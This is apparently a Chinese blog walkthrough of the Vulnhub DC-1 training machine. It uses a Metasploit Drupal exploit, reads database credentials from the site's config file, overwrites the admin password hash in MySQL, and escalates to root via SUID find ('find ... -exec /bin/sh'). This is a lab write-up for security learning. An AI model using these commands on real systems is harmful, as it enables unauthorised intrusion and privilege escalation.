Vulnhub靶场 DC-1

靶机地址
https://www.vulnhub.com/entry/dc-1-1,292/
导入到VMware里面先编辑虚拟机设置,选择NAT模式

在这里插入图片描述然后具体的扫描一下ip地址
可以看到一些开放的端口
在这里插入图片描述
尝试爆破一下ssh的密码
cewl爬取网站的信息,生成字典
hydra进行爆破
但是没有有效的结果
在这里插入图片描述
访问一下网站, 可以发现是Drupal CMS
在这里插入图片描述

打开msfconsole 搜索看看有无相关的漏洞利用

在这里插入图片描述

search drupal
在这里插入图片描述
show options 查看模块需要配置的参数
需要配置一下rhosts
在这里插入图片描述
set rhosts 192.168.75.133
然后 run 运行
进入到shell里面
在这里插入图片描述

flag1

ls可以看到一个flag1.txt

给了一个提示, 需要找配置文件
在这里插入图片描述

搜一下说是在sites目录下的字目录default 中
在这里插入图片描述

flag2

在配置文件里面找到了flag2 以及 mysql数据库的用户名和密码
(需要提取或者爆破)
在这里插入图片描述

运行一个shell
在这里插入图片描述然后再使用一个python的交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'方便看
在这里插入图片描述用find命令找到一个flag4
在这里插入图片描述

flag4

在这里插入图片描述这告诉我们需要提权, 查看后面flag

先继续之前的mysql

mysql -u dbuser -pR0ck3t进入到mysql里面

show databases;
use drupaldb;

在这里插入图片描述
show tables;
在这里插入图片描述

查看一下表, 发现admin信息
在这里插入图片描述admin的密码是经过加密的, 无法得知
文章: https://drupalchina.cn/node/2128
在这里插入图片描述

需要修改admin的密码, 找到password-hash.sh文件
在这里插入图片描述php scripts/password-hash.sh admin修改密码
在这里插入图片描述进入到数据库里面, 替换密码为 得到的密码
$S$D.s8wCozzq8y7h0NtDSfasvAE/Soq5Ieig.0MoiMBKekYSocvVLm

在这里插入图片描述

update users set pass="$S$D.s8wCozzq8y7h0NtDSfasvAE/Soq5Ieig.0MoiMBKekYSocvVLm" where name="admin";
在这里插入图片描述
然后就是登录网站了
admin / admin成功登录
在这里插入图片描述

flag3

找到flag3
在这里插入图片描述

提示了一个find的命令
在这里插入图片描述
find / -user root -perm -4000 -print 2>/dev/null
可以找到find具有suid权限
在这里插入图片描述
find /etc/passwd -exec whoami \;
可以发现是root权限
在这里插入图片描述
find / -name 666 -exec "/bin/sh" \;
接下来就是root的权限执行命令了
在这里插入图片描述

finalflag

找到最后的flag
在这里插入图片描述

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值